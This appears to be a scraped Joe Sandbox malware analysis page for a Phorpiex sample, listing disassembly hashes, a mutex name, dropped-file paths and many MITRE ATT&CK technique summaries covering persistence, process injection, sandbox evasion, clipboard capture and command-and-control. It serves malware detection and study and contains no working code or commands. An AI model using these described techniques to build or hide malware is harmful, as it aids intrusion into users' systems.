Associated: 0000003F.00000002.2634864571.00007FF6B6F25000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003F.00000002.2635020938.00007FF6B6F28000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_63_2_7ff6b6f00000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: \BaseNamedObjects\vljmdnomkxppwbqz$eth
API String ID: 1181335886-3208800472
Opcode ID: c0395dea537243c4d0dd7cc2981c96954146abf1c3cf7e98ea4515befdec0913
Instruction ID: 738e7cdce56c5875ca3145d4afb8164a76154a28c4fd2292b4aa4b7c222b08b4
Opcode Fuzzy Hash: c0395dea537243c4d0dd7cc2981c96954146abf1c3cf7e98ea4515befdec0913
Instruction Fuzzy Hash: 15014822B0C64581E220DA5AF8007EA6766AFCABD1F540270FF8C43BC5CE7DD146C704

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T52Z708x2p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Phorpiex

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\158238779.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\193938922.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\1[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\3[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\5[1]

Windows Analysis Report
T52Z708x2p.exe

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre